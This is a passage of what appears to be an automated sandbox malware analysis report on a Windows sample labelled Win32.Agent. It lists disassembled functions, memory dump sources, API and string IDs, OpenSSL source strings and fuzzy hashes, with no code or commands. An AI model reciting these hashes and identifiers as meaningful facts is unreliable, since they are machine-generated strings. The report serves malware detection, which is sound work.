                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 76cc7d293dce52ac903e1c4f27db05cd87f84480e9050da05d46ae017720b8e1
                                                                                                                                                                                                                              • Instruction ID: 45af02d93ea1e8d1b6f22812e568905abd13cf3e5e755543e889f06c577e3321
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76cc7d293dce52ac903e1c4f27db05cd87f84480e9050da05d46ae017720b8e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33111C26B18F058AEB00CFA0E8543AC33A4FB19B98F441E31DA6D467A8DF7CD5988345
                                                                                                                                                                                                                              Function 00007FF8E7962E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                              • Instruction ID: a8d93fe4485ed6c02ab5d7ae04fcad4fad133c401b35e9dbfb6bbcc85a0d7bc5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5111C26B14B068AEB00DFA1E8553AC33B4FB19798F440E35DA7E467A8DF7CD1548341
                                                                                                                                                                                                                              Function 00007FF8E80D3F4C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 7ff4e97938adc5bb38bfeebc5981b68ed2a321e3e8e63433a9fab580c5a2b058
                                                                                                                                                                                                                              • Instruction ID: 27f7410de9f7e191653617823d7b84e8f1f11ec86372db5e1df2970040e59c7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ff4e97938adc5bb38bfeebc5981b68ed2a321e3e8e63433a9fab580c5a2b058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8111822B14B058AEF009BA0E8543AD37A4FB19798F440A35EA6D467E4EF7CD1688781
                                                                                                                                                                                                                              Function 00007FF8E7A9ECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                              • Instruction ID: c5a224cc5f75a572e72758f50027b127e36ba23bbf9ecc64df38505ee2c3db7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42111C22B14F018AEB009BA4E8563AC33A4FB59798F440E31DB6D867A4EF7CD1948341
                                                                                                                                                                                                                              Function 00007FF8E7A21A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                              • API String ID: 3464486852-384499812
                                                                                                                                                                                                                              • Opcode ID: 9853c5bb08fc77abbaa0c4e474cf7ee128b4f7c4cba4e7dfb27c23ab735fd23f
                                                                                                                                                                                                                              • Instruction ID: b206b406706dfb91aa6124e935f5b276cbb19fd50f4dcdfc0182a4a222005a4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9853c5bb08fc77abbaa0c4e474cf7ee128b4f7c4cba4e7dfb27c23ab735fd23f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D15822B09B86A2EB559FA5E4827BE33A5FB44BC4F484035DA6C47795DF3CE460C312
                                                                                                                                                                                                                              Function 00007FF8E7A22126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                              • API String ID: 3464486852-1331951588
                                                                                                                                                                                                                              • Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                              • Instruction ID: 7edad13d8b5537fd63910440fdafab012b581564ed0f92f90e490d524e76972a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82C1B132B0868282F6699BA1D5527BD7360FB84BCAF085031DE6D4B795DF3EE451C702
                                                                                                                                                                                                                              Function 00007FF8E7A21EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                              • API String ID: 1666080152-118859582
                                                                                                                                                                                                                              • Opcode ID: d53d6f7ddc0b937121d58bd9f7a70022747d411cd2a28debb74a18ce98306501
                                                                                                                                                                                                                              • Instruction ID: 53bb32ebc6aa9e0c6269495bf1b92b518b1d32396af8bce54209d329a6f269b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d53d6f7ddc0b937121d58bd9f7a70022747d411cd2a28debb74a18ce98306501
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0451E621F0C68255FB659BD6E8067BE6291AF84FC4F544835DE2D577C6DE3CE8828302
                                                                                                                                                                                                                              Function 00007FF7EAD25B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                              • Instruction ID: 0832f63381606b910b54b91cc4a58b1e48be86c60960d9c6e05e0e605ec3dc26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01412922A0828242FB60EB25D50577AE760EB81BA4F944276EE5C07ADDFF3CD441C721
                                                                                                                                                                                                                              Function 00007FF7EAD19014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD19046
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7EAD0CBA5), ref: 00007FF7EAD19064
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, xrefs: 00007FF7EAD19052
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3707282323
                                                                                                                                                                                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                              • Instruction ID: 09989019731bc11d295b86d517404659dbd2b4d5995e343ae4d049c5235a4405
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3418C72A08A0286FB15EF31D8402BDA7A4EB55790B9540B6E94E47B99DE3CE4C1C322
                                                                                                                                                                                                                              Function 00007FF7EAD1CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction ID: a2595562d678dce318dea90b3f32f44ee078f15d798888efe63efa9cfaa06a50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD41D632B18B5181EB60DF25E4443BAABA5FB98B84F804132EE4D87798EF3CD401CB51
                                                                                                                                                                                                                              Function 00007FF8E80D3420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: _constructors$openssl_
                                                                                                                                                                                                                              • API String ID: 1666080152-3359357282
                                                                                                                                                                                                                              • Opcode ID: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                              • Instruction ID: f8ed5b5d63f9e061501d17fa6fa5ae923730e2668367e1ce64926075b646c41d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 117008ba4b5f8ca73d77553d2b2e8d4ddd83506b125ec0b6d7a7d7bf61da898d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF31F722A09B0287EE258B95A99433D27A4BF49FD1F094035CE5D027E5EF3CE4858B4A
                                                                                                                                                                                                                              Function 00007FF8E7A4DBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                              • API String ID: 0-402823876
                                                                                                                                                                                                                              • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                              • Instruction ID: 637ae8e2184f675c9b26383262a2017bc611067d541c150cbcca8fb9bdf573bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D31E620B09A8242FB55ABB5E8563FD2291FF887C4F884135DA2C477C6EF3CE1918302
                                                                                                                                                                                                                              Function 00007FF8E80D59E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
